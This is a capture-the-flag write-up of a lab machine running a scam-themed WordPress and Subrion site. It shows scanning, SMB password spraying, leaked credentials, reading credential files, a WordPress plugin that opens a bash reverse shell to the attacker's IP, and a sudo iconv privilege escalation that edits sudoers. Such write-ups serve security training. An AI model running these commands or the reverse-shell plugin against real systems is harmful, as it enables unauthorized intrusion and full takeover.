Rustscan
rustscan -a 10.10.75.149Output:
22/tcp open ssh syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ackgobuster
gobuster dir -u http://10.10.75.149/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,htmlOutput:
/phpinfo.php (Status: 200) [Size: 94928]
/phpinfo.php (Status: 200) [Size: 94928]
/server-status (Status: 403) [Size: 277]
/test (Status: 301) [Size: 311] [--> http://10.10.75.149/test/]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.75.149/wordpress/]We have 2 website:
- wordpress
- scam page
wpscan
wpscan --url http://10.10.75.149/wordpress/ --enumerate uOutput
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
...
[+] WordPress theme in use: teczilla
[!] The version is out of date, the latest version is 1.1.4
...
[+] support
...
http://10.10.75.149/wordpress/index.php/index.php/wp-json/wp/v2/users/?per_page=100&page=1
...smb
crackmapexec smb 10.10.75.149 -u support -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txtOutput:
support:123456smbmap -H 10.10.75.149 -R -u "support" -p "123456"Output:
[+] IP: 10.10.75.149:445 Name: 10.10.75.149 Status: Guest session
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
websvr READ ONLY
.\websvr\\*
dr--r--r-- 0 Sat May 29 09:17:38 2021 .
dr--r--r-- 0 Sat May 29 09:03:47 2021 ..
fr--r--r-- 273 Sat May 29 09:17:38 2021 enter.txt
IPC$ NO ACCESS IPC Service (TechSupport server (Samba, Ubuntu))smbclient //10.10.75.149/websvr -U "support"
Password for [WORKGROUP\support]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 09:17:38 2021
.. D 0 Sat May 29 09:03:47 2021
enter.txt N 273 Sat May 29 09:17:38 2021
8460484 blocks of size 1024. 5695980 blocks available
smb: \> cat enter.txt
cat: command not found
smb: \> more enter.txt
getting file \enter.txt of size 273 as /tmp/smbmore.KPey6E (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->This hash is cooked: 7sKvntXdPEJaxazce9PXi24zaFrLiKWCk
Scam2021
Let’s see what is subrion:
https://www.exploit-db.com/exploits/49876
shell
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
This revershell don’t smell good…
cat /etc/passwd
scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash
cat /var/www/*/w*/*config*
Wordpress creds:
user: support
password: ImAScammerLOL!123!
wordpress revershell
wp_plugin_rv.php
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://peanutstick.githubio.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.50.167/4949 0>&1'");
?>Then listen:
nc -lnvp 4949Upload it:
ssh
ssh scamsite@10.10.75.149With the last password.
sudo -l
...
(ALL) NOPASSWD: /usr/bin/iconvhttps://gtfobins.github.io/gtfobins/iconv/
privesc
echo "scamsite ALL=(ALL:ALL) ALL" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"
sudo su